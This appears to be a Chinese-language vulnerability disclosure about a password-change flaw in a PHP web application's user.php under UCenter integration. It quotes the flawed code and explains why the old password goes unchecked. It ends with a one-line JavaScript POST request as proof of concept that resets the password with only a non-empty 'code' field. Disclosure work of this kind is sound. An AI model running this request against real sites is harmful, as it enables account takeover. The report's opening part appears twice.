### 简要描述: 最新版本也存在此问题 ### 详细说明: 该漏洞有个前提,需要会员系统整合ucenter 问题出在 user.php $action == 'act_edit_password' [<img src="https://images.seebug.org/upload/201402/17093718e31e126b76cb15fd17cc3ad8b15588ef.png" alt="QQ截图20140217093645.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/17093718e31e126b76cb15fd17cc3ad8b15588ef.png) ``` $old_password = isset($_POST['old_password']) ? trim($_POST['old_password']) : ''; $new_password = isset($_POST['new_password']) ? trim($_POST['new_password']) : ''; $user_id = isset($_POST['uid']) ? intval($_POST['uid']) : $user_id; $code = isset($_POST['code']) ? trim($_POST['code']) : ''; if (strlen($new_password) < 6) { show_message($_LANG['passport_js']['password_shorter']); } $user_info = $user->get_profile_by_id($user_id); //论坛记录 if (($user_info && (!empty($code) && md5($user_info['user_id'] . $_CFG['hash_code'] . $user_info['reg_time']) == $code)) || ($_SESSION['user_id']>0 && $_SESSION['user_id'] == $user_id &&...
### 简要描述: 最新版本也存在此问题 ### 详细说明: 该漏洞有个前提,需要会员系统整合ucenter 问题出在 user.php $action == 'act_edit_password' [<img src="https://images.seebug.org/upload/201402/17093718e31e126b76cb15fd17cc3ad8b15588ef.png" alt="QQ截图20140217093645.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/17093718e31e126b76cb15fd17cc3ad8b15588ef.png) ``` $old_password = isset($_POST['old_password']) ? trim($_POST['old_password']) : ''; $new_password = isset($_POST['new_password']) ? trim($_POST['new_password']) : ''; $user_id = isset($_POST['uid']) ? intval($_POST['uid']) : $user_id; $code = isset($_POST['code']) ? trim($_POST['code']) : ''; if (strlen($new_password) < 6) { show_message($_LANG['passport_js']['password_shorter']); } $user_info = $user->get_profile_by_id($user_id); //论坛记录 if (($user_info && (!empty($code) && md5($user_info['user_id'] . $_CFG['hash_code'] . $user_info['reg_time']) == $code)) || ($_SESSION['user_id']>0 && $_SESSION['user_id'] == $user_id && $user->check_user($_SESSION['user_name'], $old_password))) { if ($user->edit_user(array('username'=> (empty($code) ? $_SESSION['user_name'] : $user_info['user_name']), 'old_password'=>$old_password, 'password'=>$new_password), empty($code) ? 0 : 1)) { $user->logout(); show_message($_LANG['edit_password_success'], $_LANG['relogin_lnk'], 'user.php?act=login', 'info'); } else { show_message($_LANG['edit_password_failure'], $_LANG['back_page_up'], '', 'info'); } } ``` 我把上面主要代码精简一下 $code='123'; $old_password=null; $user_info['user_name']=当前用户名 ``` if( false ||$_SESSION['user_id']>0 && $_SESSION['user_id'] == $user_id && $user->check_user($_SESSION['user_name'], $old_password))){ #ucenter 模块中check_user未对原密码校验此处为True if ($user->edit_user(array('username'=> ( $user_info['user_name']), 'old_password'=>$old_password, 'password'=>$new_password), 1)) { #edit_user() $code不为空,所以最后一个参数为1 则不校验原密码直接修改 成功修改密码 } } ``` 问题主要出在两个地方 1.ucenter用户整合模块实现check_user()时未校验原密码 2. 通过code找回密码的代码和通过原密码修改密码的代码弄的到一块了 if语句嵌套太多容易扯着蛋蛋 ### 漏洞证明: 登录网站打开调试 粘贴以下js代码运行(为了简化代码,假设有jquery) ``` $.post('user.php?act=act_edit_password',{'new_password':'123456',code:'不为空就行'}, function(data){ }); ``` 然后刷新代码 若是退出状态则修改密码成功
